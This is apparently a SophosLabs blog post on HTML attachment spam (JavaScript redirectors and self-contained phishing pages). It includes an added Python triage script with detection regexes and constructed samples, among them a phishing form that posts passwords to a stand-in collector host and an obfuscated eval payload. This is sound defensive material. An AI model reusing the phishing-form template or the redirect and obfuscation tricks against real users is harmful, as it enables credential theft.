The Recent Burst of HTML Attachment Spam

During the last four months, SophosLabs has seen a sharp resurgence of HTML attachment spam. As shown in the following figure, it accounted for 8% of all spam in June and September, and for about 2-3% in July, August and October.

These malicious HTML attachments fall into two categories: malicious JavaScript redirectors and phishing attachments.

Malicious JavaScript redirectors: In June, a large volume of malicious spam carrying embedded HTML attachments (detected as Troj/JSRedir-BO) used lures based on Facebook password resets, the FIFA World Cup and Skype [1,2].

SophosLabs then saw further waves of mass-spammed JavaScript redirectors in September, detected as JS/WndRed-B.

Phishing attachments: In an attempt to evade detection, phishing scammers have continued to tweak the way they distribute their scams. Large-volume phishing campaigns targeting financial organizations such as PayPal and Banche di Credito Cooperativo were sent out in the last few months. Instead of setting up a bogus financial website, the scammers insert the phishing content directly into the HTML attachment, so there is no hosted phishing page for URL filters to block or for takedown; only the form's submission target remains remote (as shown below):
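To make the two attachment types concrete, the following is an added example, written for this page and not SophosLabs code or any Sophos detection logic, that triages an HTML attachment for the indicators described above: a script that assigns to `location`, a `<meta http-equiv="refresh">` redirect, decoder/eval obfuscation, and a form with a password field whose action points at a remote host (which is what a self-contained phishing attachment needs to exfiltrate credentials). The indicator patterns, the `example.test` hostnames and all five sample attachments are constructed for illustration and do not reproduce any real campaign.

```python
"""Heuristic triage of HTML e-mail attachments (added example, not Sophos code).

Flags the two attachment classes discussed above: JavaScript/meta-refresh
redirectors and self-contained phishing forms. Every pattern below is an
assumed heuristic for illustration, not a vendor detection signature.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AttachmentScanner(HTMLParser):
    """Collects inline script bodies, meta-refresh targets, and form details."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # raw bodies of inline <script> elements
        self.meta_refresh = []   # target URLs of <meta http-equiv="refresh">
        self.forms = []          # one dict per <form>: action + input types
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # HTMLParser lower-cases tag and attribute names
        if tag == "script":
            self._in_script = True
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content") or "", re.I)
            if m:
                self.meta_refresh.append(m.group(1))
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:      # script content arrives raw (CDATA mode)
            self.scripts.append(data)


# Assumed redirector indicator: assignment to a location property (not a
# comparison), or a call that replaces the current document.
_JS_REDIRECT = re.compile(
    r"(?:window|document|top|self|parent)?\.?location(?:\.href)?\s*=(?!=)|"
    r"location\.(?:replace|assign)\s*\(", re.I)
# Assumed obfuscation indicator: decoders commonly feeding eval/document.write.
_JS_OBFUSCATION = re.compile(
    r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)


def triage(html: str) -> dict:
    """Return the indicator names found in one attachment plus a verdict."""
    p = _AttachmentScanner()
    p.feed(html)
    p.close()
    indicators = set()
    js = "\n".join(p.scripts)
    if _JS_REDIRECT.search(js):
        indicators.add("js-redirector")
    if _JS_OBFUSCATION.search(js):
        indicators.add("obfuscated-js")
    if p.meta_refresh:
        indicators.add("meta-refresh-redirector")
    for f in p.forms:
        # An attachment opened from disk can only reach a collector through an
        # absolute action URL; a password field posted there is the phishing case.
        if "password" in f["inputs"] and urlparse(f["action"]).netloc:
            indicators.add("credential-form-to-external-host")
    return {"indicators": sorted(indicators),
            "verdict": "suspicious" if indicators else "no-indicators"}


# Constructed sample attachments (not real campaign artifacts).
SAMPLE_JS_REDIRECTOR = """<html><body>
<script>window.location.href = "http://redirect.example.test/landing";</script>
</body></html>"""
SAMPLE_OBFUSCATED = """<html><body><script>
eval(unescape("%61%6c%65%72%74%28%31%29"));
</script></body></html>"""
SAMPLE_META_REFRESH = """<html><head>
<meta http-equiv="refresh" content="0;url=http://redirect.example.test/">
</head><body>Loading</body></html>"""
SAMPLE_PHISH_FORM = """<html><body><h2>Verify your account</h2>
<form method="post" action="http://collector.example.test/login.php">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Log in">
</form></body></html>"""
SAMPLE_BENIGN = """<html><body><p>Your monthly statement is attached.</p>
<form method="post" action="/feedback"><input type="text" name="comment"></form>
</body></html>"""

if __name__ == "__main__":
    for name, sample in [("js-redirect", SAMPLE_JS_REDIRECTOR), ("obfuscated", SAMPLE_OBFUSCATED),
                         ("meta-refresh", SAMPLE_META_REFRESH), ("phish-form", SAMPLE_PHISH_FORM),
                         ("benign", SAMPLE_BENIGN)]:
        print(f"{name:13s} {triage(sample)}")
```

The obfuscated sample only trips the decoder heuristic: the scanner does not execute or decode the script, so a redirect hidden inside an `unescape` string is reported as obfuscation rather than as a redirector. That is the expected limitation of static triage and the reason the two indicators are kept separate.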

Although HTML attachment spam has spiked repeatedly during the last four months, from SophosLabs' point of view the campaigns have been inconsistent in their distribution, and SophosLabs has no reason to believe that this pattern is likely to change in the next few months.